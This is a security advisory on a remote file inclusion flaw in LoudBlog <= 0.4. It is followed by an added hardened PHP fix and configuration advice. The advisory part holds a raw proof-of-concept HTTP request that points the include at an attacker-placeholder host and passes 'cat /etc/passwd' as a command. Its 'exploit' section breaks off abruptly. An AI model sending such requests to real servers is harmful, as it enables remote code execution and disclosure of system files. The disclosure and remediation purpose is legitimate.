------------- LoudBlog <= 0.4 arbitrary remote inclusion -----------

software:
site: http://loudblog.de/
description: "Loudblog is a sleek and easy-to-use Content Management System (CMS) for publishing media content on the web. It automatically generates a skinnable website and an RSS-Feed for Podcasting. Just upload your audio/video files, add some notes and links, and you're done!"

--------------------------------------------------------------------

i) vulnerable code in loudblog/inc/backend_settings.php at lines 3-6:

...
//change the language if required by POST
if (isset($_POST['language'])) {
    include_once($GLOBALS['path']."/loudblog/lang/".$_POST['language'].".php");
}
...

poc:

POST [path_to_loudblog]/loudblog/inc/backend_settings.php?cmd=cat%20/etc/passwd&GLOBALS[path]=http://[somehost] HTTP/1.1\r\n";
Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
Host: [target]
Content-Length: [data_length]
Connection: Close

-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="language\r\n";
Content-Type: suntzu

-----------------------------7d529a1d23092a--

where on http:/[somehost]/loudblog/inc/suntzu.php/index.html, you have code like this:

--------------------------------------------------------------------

exploit:
******LoudBlog 4.0 remote commands execution***********
a script by rgod at http://rgod.altervista.org
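The include at lines 3-6 has two independent defects: the base directory comes from `$GLOBALS['path']`, which the request in the PoC overwrites (that is what `GLOBALS[path]=http://[somehost]` in the query string relies on, via register_globals), and `$_POST['language']` is concatenated into the path with no check at all, so the file finally included can be any local or remote `.php` the client names. The block below is an added example of a hardened replacement; it is not LoudBlog's own code. It assumes `inc/` sits directly under `loudblog/` and the language files live in `loudblog/lang/`; the constant `LOUDBLOG_BASE` and the function `resolve_language_file` are names chosen for this example.

```php
<?php
// Added example, not LoudBlog's code: a safe replacement for the language
// include in loudblog/inc/backend_settings.php.
//
// Original (vulnerable) form, quoted from the advisory for reference:
//   if (isset($_POST['language'])) {
//       include_once($GLOBALS['path']."/loudblog/lang/".$_POST['language'].".php");
//   }

// 1. The base directory is derived from the script's own location, never from
//    a global the request could populate. (Assumption: inc/ is under loudblog/.)
define('LOUDBLOG_BASE', __DIR__ . '/..');

/**
 * Map a user-supplied language token to the absolute path of a shipped
 * language file. Returns null for anything that is not an existing, on-disk
 * file inside $langDir, so the caller never includes what the user typed.
 */
function resolve_language_file(string $requested, string $langDir): ?string
{
    // 2. Syntactic check: short tokens such as "en", "de", "pt-br" only.
    //    Slashes, dots, colons and NUL bytes are rejected before any path is built.
    if (!preg_match('/^[A-Za-z0-9_-]{1,16}$/', $requested)) {
        return null;
    }

    // 3. Allowlist built from what actually exists in the language directory,
    //    keyed by file name without the .php suffix.
    $available = [];
    foreach (glob($langDir . '/*.php') ?: [] as $file) {
        $available[basename($file, '.php')] = $file;
    }
    if (!isset($available[$requested])) {
        return null;
    }

    // 4. Canonicalise and confirm the chosen file still lies inside $langDir.
    $real = realpath($available[$requested]);
    $base = realpath($langDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Change the language if requested by POST, but only to a known, local file.
$langDir = LOUDBLOG_BASE . '/lang';
if (isset($_POST['language'])) {
    $file = resolve_language_file((string) $_POST['language'], $langDir);
    if ($file !== null) {
        include_once $file;
    }
    // Unknown language: keep the default rather than include anything else.
}
```

The code fix removes both the user-controlled base and the user-controlled file name, so neither a remote URL nor a local traversal path can reach `include_once`. Independently of the code, the PoC also depends on PHP configuration: `register_globals = Off` (the default since PHP 4.2 and removed entirely in 5.4) stops the request from touching `$GLOBALS['path']`, and `allow_url_include = Off` (available since 5.2) stops `include` from fetching an `http://` target even if a path were still attacker-influenced. Both settings are worth checking on any host that ran this software.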